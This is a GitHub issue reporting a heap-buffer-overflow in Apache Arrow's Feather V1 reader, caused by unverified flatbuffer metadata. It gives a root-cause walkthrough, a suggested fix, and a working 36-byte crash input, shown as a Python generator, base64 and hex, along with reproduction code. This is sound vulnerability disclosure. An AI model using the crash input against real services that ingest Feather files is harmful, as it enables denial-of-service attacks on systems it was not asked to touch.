OwenSanzas opened a new issue, #50229:
URL: https://github.com/apache/arrow/issues/50229
## Summary
Opening a crafted Feather **V1** file through the public
`arrow::ipc::feather::Reader::Open` API triggers an AddressSanitizer
heap-buffer-overflow (out-of-bounds read) inside Arrow's legacy Feather V1
metadata parsing. The reader calls `fbs::GetCTable` on the trailing metadata
flatbuffer **without first running a `flatbuffers::Verifier`**, then
dereferences attacker-controlled offsets in `ReaderV1::ReadSchema`
(`cpp/src/arrow/ipc/feather.cc:178`) before any `Status` error can be
returned.
A 36-byte file with the `FEA1` magic and a corrupt footer triggers the crash
deterministically, so any service that ingests untrusted Feather V1 files can
be crashed (denial of service).
Tested at pinned commit `16fe34250a2ef261790b9cc414fdf0831669cf9f`
(25.0.0-SNAPSHOT).
## Root Cause
`ReaderV1::Open` reads the trailing metadata flatbuffer and obtains a typed
view of it via `fbs::GetCTable(...)`. A flatbuffer obtained this way is
**untrusted**: its vtable, field offsets, and vector lengths are
attacker-controlled bytes. The flatbuffers contract requires a caller to run
a `flatbuffers::Verifier` over the buffer before touching any generated
accessor; only verification guarantees that every offset stays inside the
buffer.
`ReaderV1::Open` skips that step. It goes straight from `GetCTable` to
`ReadSchema()`, which dereferences `metadata_->columns()` on the unverified
table. `columns()` is a flatbuffers `GetPointer` that reads the vtable and an
offset field; with a corrupt offset, `flatbuffers::ReadScalar` reads past the
end of the metadata buffer.
Vulnerable code (`cpp/src/arrow/ipc/feather.cc:172`):
```cpp
  metadata_ = fbs::GetCTable(metadata_buffer_->data());  // no flatbuffers::Verifier
  return ReadSchema();
}
Status ReadSchema() {
  std::vector<std::shared_ptr<Field>> fields;
  // line 178: dereferences the unverified flatbuffer
  for (int i = 0; i < static_cast<int>(metadata_->columns()->size()); ++i) {
    const fbs::Column* col = metadata_->columns()->Get(i);
    std::shared_ptr<DataType> type;
    RETURN_NOT_OK(
        GetDataType(col->values(), col->metadata_type(), col->metadata(), &type));
    fields.push_back(::arrow::field(col->name()->str(), type));
  }
```
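To make the "verify before access" point concrete, here is a minimal Python sketch of the table walk a generated accessor performs (root offset, then table, then vtable, then field slot), with every read bounds-checked. It is a simplified model of the flatbuffers layout, not the real `flatbuffers::Verifier` (which also checks alignment, nested tables, vectors, and strings). The helper names `checked_read` and `field_offset` are hypothetical and exist only for this illustration. In Python an unchecked out-of-range read would raise rather than touch adjacent memory; in C++ the same unchecked read is the out-of-bounds access ASan reports.

```python
import struct


def checked_read(buf, pos, fmt):
    """Read one little-endian scalar, rejecting positions outside buf."""
    width = struct.calcsize(fmt)
    if pos < 0 or pos + width > len(buf):
        raise ValueError(
            f"{width}-byte read at offset {pos} is outside a {len(buf)}-byte buffer"
        )
    return struct.unpack_from(fmt, buf, pos)[0]


def field_offset(buf, field_id):
    """Walk root -> table -> vtable; return the field's slot value (0 = absent)."""
    table = checked_read(buf, 0, "<I")               # root offset at byte 0
    vtable = table - checked_read(buf, table, "<i")  # signed offset back to vtable
    vtable_size = checked_read(buf, vtable, "<H")    # vtable length in bytes
    slot = 4 + 2 * field_id                          # skip the two uint16 header fields
    if slot + 2 > vtable_size:
        return 0                                     # field not present in this table
    return checked_read(buf, vtable + slot, "<H")


# Hand-built 20-byte buffer: root offset, a 6-byte vtable (+2 pad), then the table.
well_formed = struct.pack("<IHHHHiI", 12, 6, 8, 4, 0, 8, 42)
print(field_offset(well_formed, 0))  # 4

# An empty buffer and a buffer of 0xff bytes are both rejected before any
# out-of-range position is dereferenced.
for bad in (b"", b"\xff" * 8):
    try:
        field_offset(bad, 0)
    except ValueError as err:
        print("rejected:", err)
```

With an empty metadata buffer the very first read (the root offset) is already out of range, which is the situation the PoC creates.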
Call chain (attacker bytes -> fault):
```
arrow::ipc::feather::Reader::Open       feather.cc:773 / :794  (public API)
  -> ReaderV1::Open                     feather.cc:173
       metadata_ = fbs::GetCTable(...)  feather.cc:172  <- NO flatbuffers::Verifier
  -> ReaderV1::ReadSchema               feather.cc:178
       metadata_->columns()->size() -> fbs::CTable::columns()  feather_generated.h:698
         -> flatbuffers::Table::GetVTable
           -> flatbuffers::ReadScalar   base.h:440  <- OOB read
```
The metadata buffer is sized to the file's declared `metadata_length`; the
corrupt offset points past that region, so the accessor reads out of bounds.
Arrow's own threat model (`docs/source/cpp/security.rst`, "Ingesting untrusted
data") states the IPC reader APIs must return an `arrow::Status` error on
malformed input. The V1 reader violates that contract: it crashes before it
can return a `Status`.
## PoC
A 36-byte malformed Feather V1 file: the `FEA1` magic header, 24 bytes of
`0xff` filler, a `metadata_length` of 0, and the trailing `FEA1` magic.
`Reader::Open` selects the legacy V1 path on the `FEA1` magic, then
`GetCTable` builds a table over an empty (zero-length) metadata region and
`columns()` reads out of bounds.
```python
# generate_poc.py: re-create the shipped 36-byte crash input
poc = (b"FEA1"                # leading magic
       + b"\xff" * 24         # corrupt footer body
       + b"\x00\x00\x00\x00"  # metadata_length = 0
       + b"FEA1")             # trailing magic
assert len(poc) == 36
# Use a context manager so the file is flushed and closed deterministically.
with open("poc.bin", "wb") as f:
    f.write(poc)
```
Crash input size: 36 bytes (`poc/poc.bin`, md5
`9d96bcc065b6672396fed18492792d03`).
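The layout described above can be checked with a short sketch that locates the metadata region the same way the reader's `size - footer_size - metadata_length` expression does. This is an illustration, not Arrow's code: `locate_metadata` is a hypothetical helper, and the footer being a 4-byte little-endian length followed by the 4-byte magic (`FOOTER_SIZE = 8`) is an assumption inferred from the PoC layout.

```python
import struct

MAGIC = b"FEA1"
# Assumption: footer = 4-byte little-endian metadata_length + 4-byte magic.
FOOTER_SIZE = 4 + len(MAGIC)


def locate_metadata(data):
    """Return (offset, length) of the metadata region, or raise ValueError."""
    if len(data) < len(MAGIC) + FOOTER_SIZE:
        raise ValueError("file too small for Feather V1 framing")
    if data[:4] != MAGIC or data[-4:] != MAGIC:
        raise ValueError("missing FEA1 magic")
    (metadata_length,) = struct.unpack_from("<I", data, len(data) - FOOTER_SIZE)
    offset = len(data) - FOOTER_SIZE - metadata_length
    if offset < len(MAGIC):
        raise ValueError("metadata_length exceeds file size")
    return offset, metadata_length


poc = b"FEA1" + b"\xff" * 24 + b"\x00\x00\x00\x00" + b"FEA1"
offset, length = locate_metadata(poc)
print(offset, length)  # 28 0
```

Under those assumptions the framing of the PoC is valid, but the metadata region it describes is zero bytes long, so there is nothing for a flatbuffer accessor to read safely.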
## Reproduction
Build Arrow C++ from source with `-DARROW_IPC=ON` and AddressSanitizer, then
open the attached Feather V1 file through the public reader API:
```cpp
#include <memory>
#include <arrow/io/memory.h>
#include <arrow/ipc/feather.h>
// auto buf = ...read poc.bin...;
auto source = std::make_shared<arrow::io::BufferReader>(buf);
std::shared_ptr<arrow::ipc::feather::Reader> reader;
// The OOB read happens inside Open, before any Status is returned.
auto st = arrow::ipc::feather::Reader::Open(source).Value(&reader);
```
`ReaderV1::Open` does `metadata_ = fbs::GetCTable(metadata_buffer_->data())`
with **no `flatbuffers::Verifier`** over the metadata, then `ReadSchema()`
dereferences `metadata_->columns()` on the unverified flatbuffer:
```
AddressSanitizer: heap-buffer-overflow READ
#0 flatbuffers::ReadScalar<...> base.h
#1 arrow::ipc::feather::fbs::CTable::columns() feather_generated.h
#2 ReaderV1::ReadSchema / ReaderV1::Open ipc/feather.cc
```
The unverified `GetCTable` + `columns()` deref is still present in current
`master` (`cpp/src/arrow/ipc/feather.cc:172`).
PoC: 36-byte `.feather` file (recreate from the base64 below).
## Suggested Fix
Run a `flatbuffers::Verifier` over the metadata buffer before calling
`fbs::GetCTable` / dereferencing any accessor, returning `Status::Invalid` on
failure — matching how the V2/IPC reader rejects malformed metadata:
```diff
   ARROW_ASSIGN_OR_RAISE(metadata_buffer_,
                         source->ReadAt(size - footer_size - metadata_length,
                                        metadata_length,
                                        /*allow_short_read=*/false));
-  metadata_ = fbs::GetCTable(metadata_buffer_->data());
+  flatbuffers::Verifier verifier(metadata_buffer_->data(),
+                                 metadata_buffer_->size());
+  if (!fbs::VerifyCTableBuffer(verifier)) {
+    return Status::Invalid("Feather V1 metadata failed flatbuffer verification");
+  }
+  metadata_ = fbs::GetCTable(metadata_buffer_->data());
   return ReadSchema();
```
(The exact verifier symbol depends on the generated `feather_generated.h`;
the principle is "verify before accessing", and the precise call is the
upstream maintainer's judgement.)
## PoC bytes (self-contained)
The trigger input is **36 bytes** (`poc/poc.bin`).
Recreate it exactly with:
```bash
base64 -d > poc.bin <<'B64'
RkVBMf///////////////////////////////wAAAABGRUEx
B64
```
Hex:
`46454131ffffffffffffffffffffffffffffffffffffffffffffffff0000000046454131`
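As a cross-check, the following sketch rebuilds the input from the generator expression and prints its length, base64, hex, and md5 so they can be compared by eye with the strings and digest quoted in this report. It uses only the Python standard library; the variable names are illustrative.

```python
import base64
import hashlib

# Same byte layout as generate_poc.py.
poc = b"FEA1" + b"\xff" * 24 + b"\x00\x00\x00\x00" + b"FEA1"

poc_b64 = base64.b64encode(poc).decode("ascii")
poc_hex = poc.hex()

print(len(poc))                        # size in bytes
print(poc_b64)                         # compare with the base64 heredoc
print(poc_hex)                         # compare with the hex string
print(hashlib.md5(poc).hexdigest())    # compare with the md5 quoted for poc.bin
```

If any of the printed values differs from the report, the local `poc.bin` is not the input that was tested.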
## Credit
Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra,
Guido Vranken).